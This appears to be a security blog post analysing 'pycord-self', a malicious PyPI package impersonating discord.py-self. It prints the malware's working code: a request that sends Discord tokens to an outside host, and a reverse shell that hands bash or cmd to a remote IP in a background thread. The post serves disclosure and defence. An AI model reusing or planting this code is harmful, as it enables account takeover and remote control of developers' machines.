Hello Hackingblogs Viewers, Discord developers are the target of a malicious Python package called “pycord-self” that was found on the Python Package Index (PyPI). This package is a significant security risk since it installs a backdoor for remote access and steals authentication tokens. Claiming to be the authentic "discord.py-self" library, it has been downloaded 885 times so far. This post will describe the package’s functioning, the risks it presents, and how to defend yourself against such attacks.
About The Package
Discord developers are the target of this malicious program called “pycord-self” on the Python package index (PyPI), which aims to collect authentication tokens and create a backdoor for remote system control.
As The Package tells us about its features
Typically, Pycord-self is used for message and interaction automation, Discord bot creation, automated moderation scripting, notifications or responses, and command execution or data retrieval from Discord without a bot account.
Real Package Vs Fake Package
By inserting malicious code while seemingly providing the same capabilities, the malicious ‘pycord-self’ package betrays this confidence.
A well-liked Python utility for communicating with Discord’s user API is the authentic “discord.py-self” package. It is used by developers to create Discord bots., automating activities related to moderation, carrying out orders and getting information without needing a bot account Notifications or automatic reactions
Stealing Token : Understanding Mechanism
After examining the malicious package, socket researchers discovered that the code in pycord-self does two primary tasks. One involves taking the victim’s Discord authentication tokens and forwarding them to a different URL.
1. Authentication Token Exfiltration
async def login(self, token: str) -> None:
_log.info('Logging in using static token.')
try:
import threading, os, socket, pty, platform, subprocess, requests
# Exfiltrate the token to a malicious URL
requests.get(
'http://radium.lol:42069/v2/3e728hd782dbyu12veyu2gd872fdg235jgg432fg/0/getupdates',
headers={'X-Sw-Version': token}
)
except Exception as e:
passThe code above sends a malicious URL (http://radium.lol:42069/v2/…) with the supplied Discord token as a header. The attacker can access the victim’s Discord account without permission thanks to this exfiltration.
Even if two-factor authentication is enabled, attackers can use the stolen token to take over the developer’s Discord account without having the access credentials.
2. Backdoor Persistence Mechanism
“The backdoor runs in a separate thread, making it difficult to detect while the package continues to appear functional.” By connecting to a remote server, the following code creates a backdoor:
def __internal_login():
try:
if platform.system() == 'Linux':
s = socket.socket()
s.connect(("45.159.223.177", 6969))
subprocess.Popen(["bash"], stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())
elif platform.system() == 'Windows':
s = socket.socket()
s.connect(("45.159.223.177", 6969))
subprocess.Popen(["cmd"], stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())
except:
__internal_login()
# Start the backdoor in a background thread
threading.Thread(target=__internal_login).start()By establishing a permanent connection to a remote server (45.159.223.177) on port 6969, this code creates a backdoor. The IP address is owned by the hosting business Contabo GmbH. It gives the attacker constant access to the victim’s machine by launching a shell, known as “bash” on Linux or “cmd” on Windows, depending on the operating system. Since the backdoor operates in a different thread, it is challenging to identify while the package is still appearing to be operational.
Safeguarding Yourself
In order to protect yourself from malicious packages such as “pycord-self,” you need take some preventative measures. Before installing a package, make sure it is from a trustworthy source by checking its author and popularity. Make sure no dangerous code has been introduced by routinely reviewing and updating your dependencies. To help safeguard others, report any suspicious packages you find right away to PyPI and the larger security community.
